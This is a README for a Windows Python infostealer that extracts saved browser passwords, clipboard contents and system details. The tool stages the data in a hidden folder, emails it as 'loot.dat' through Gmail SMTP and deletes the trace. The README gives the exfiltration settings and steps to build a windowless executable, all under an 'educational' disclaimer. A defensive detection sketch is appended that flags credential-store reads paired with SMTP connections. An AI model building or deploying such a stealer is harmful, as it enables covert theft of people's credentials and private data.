This code is designed to steal browser passwords, clipboard data, and system information, then exfiltrate that sensitive data via email.
Version: 1.0
Platform: Windows
This tool is strictly for educational, research, and security awareness demonstrations on systems you own or have explicit written permission to audit. Unauthorized running of this software is illegal and unethical! The authors disclaim all liability for misuse.
This Python-based script demonstrates how browser-stored credentials, basic system information, and clipboard data can be programmatically harvested from a Windows user account and securely exported via email.
The data is written to a stealth location (SysDataHidden) and automatically sent to a user-specified mail address before the trace file is deleted.
It illustrates:
- Real-world security risks when local machines are compromised (for blue teams & educators).
- How browsers store and encrypt saved passwords on disk.
- The importance of endpoint and credential hygiene.
- 🕵️‍♂️ Extracts Chrome, Edge, Opera, Opera GX, and Brave saved credentials.
- 💡 Decrypts passwords using system APIs (as browsers would).
- 🖥️ Collects OS and network fingerprint information.
- 📋 Reads clipboard contents (what’s currently copied).
- 🤫 Report file is saved to a hidden OS folder, then deleted after emailing.
- ✉️ Data is emailed to a trusted mailbox via secure Gmail SMTP.
- Windows 10/11 system.
- Python 3.7+ (tested up to 3.11+).
- The following modules installed:
  ```
  pip install pyperclip pycryptodome requests pypiwin32
  ```
- Gmail account with App Passwords (when 2-Step Verification is enabled).
Edit these lines at the top of main.py:
```python
SENDER_EMAIL = "[email protected]"     # Your Gmail address
APP_PASSWORD = "abcd efgh ijkl mnop"  # Gmail App Password (not your real password!)
RECIPIENT_EMAIL = "[email protected]"  # Where to send the loot.dat
```
Never share your real password. Always use an App Password for scripts!
- Via Terminal:
  ```
  python info.py
  ```
- To create an .exe (no console):
  - Install PyInstaller:
    ```
    pip install pyinstaller
    ```
  - Build:
    ```
    pyinstaller --onefile --windowed info.py
    ```
  - Find the executable in `/dist`.
- Check the email inbox set in `RECIPIENT_EMAIL` for the attached `loot.dat`.
- File contents will include all extracted browser credentials, system info, and clipboard data at the time of execution.
- The loot file is auto-deleted from disk after being sent.
- Try running the script with/without browsers open to see what changes in extraction results.
- Review loot.dat contents and spot the sensitive data exposed.
- Use this exercise to teach defense:
  - The risk of unlocked user sessions.
  - Why to avoid storing passwords in browsers.
  - The importance of endpoint protections (anti-malware, EDR, OS security).
- Do NOT run on other people's devices or networks.
- Do NOT send extracted data over untrusted channels or third-party systems.
- Inform users before running any extraction demos.
- Delete all loot files from your environment after teaching.
This is a demonstration and teaching script provided "AS IS".
You are responsible for any use, authorized or unauthorized.
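
For the defensive half of the exercise (the endpoint-protection point in the teaching list above), the following is an added example and not part of this tool's code: a Python sketch of behavioural detection that correlates a non-browser process reading Chromium credential-store files with an outbound mail-submission connection from the same process. The event tuples, user paths, port and `info.exe` location are constructed sample data; `Login Data` and `Local State` are assumed here as the watched Chromium profile files, and the parent folder of `SysDataHidden` is a placeholder.

```python
import ntpath

# Constructed sample telemetry (not real logs): (seconds, process image, event kind, target)
EVENTS = [
    (0, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "file_read",
     r"C:\Users\demo\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (5, r"C:\Users\demo\Downloads\info.exe", "file_read",
     r"C:\Users\demo\AppData\Local\Google\Chrome\User Data\Local State"),
    (6, r"C:\Users\demo\Downloads\info.exe", "file_read",
     r"C:\Users\demo\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (9, r"C:\Users\demo\Downloads\info.exe", "file_write",
     r"C:\PLACEHOLDER\SysDataHidden\loot.dat"),
    (12, r"C:\Users\demo\Downloads\info.exe", "net_connect", "smtp.gmail.com:587"),
    (20, r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe", "net_connect",
     "smtp.gmail.com:587"),
]

# Name matching is for illustration; a real rule should also check image path and signer.
BROWSERS = {"chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}
CRED_FILES = {"login data", "local state"}
MAIL_PORTS = {"25", "465", "587"}

def classify(image, kind, target):
    """Map one raw event to a detection signal name, or None if benign."""
    exe = ntpath.basename(image).lower()
    if kind == "file_read" and ntpath.basename(target).lower() in CRED_FILES:
        return None if exe in BROWSERS else "cred_store_read"
    if kind == "file_write" and "sysdatahidden" in target.lower():
        return "staging_write"
    if kind == "net_connect" and target.rsplit(":", 1)[-1] in MAIL_PORTS:
        return "smtp_connect"
    return None

def detect(events, window=300):
    """Alert when one process reads a credential store, then opens SMTP within `window` s."""
    seen = {}  # process image -> {signal: first timestamp}
    for ts, image, kind, target in sorted(events):
        signal = classify(image, kind, target)
        if signal:
            seen.setdefault(image.lower(), {}).setdefault(signal, ts)
    alerts = []
    for image, sig in seen.items():
        read, smtp = sig.get("cred_store_read"), sig.get("smtp_connect")
        if read is not None and smtp is not None and 0 <= smtp - read <= window:
            severity = "high" if "staging_write" in sig else "medium"
            alerts.append({"image": image, "signals": sorted(sig), "severity": severity})
    return alerts
```

On the constructed events, only the unsigned `info.exe` process is flagged; the browser reading its own store and the mail client talking to SMTP are each benign on their own.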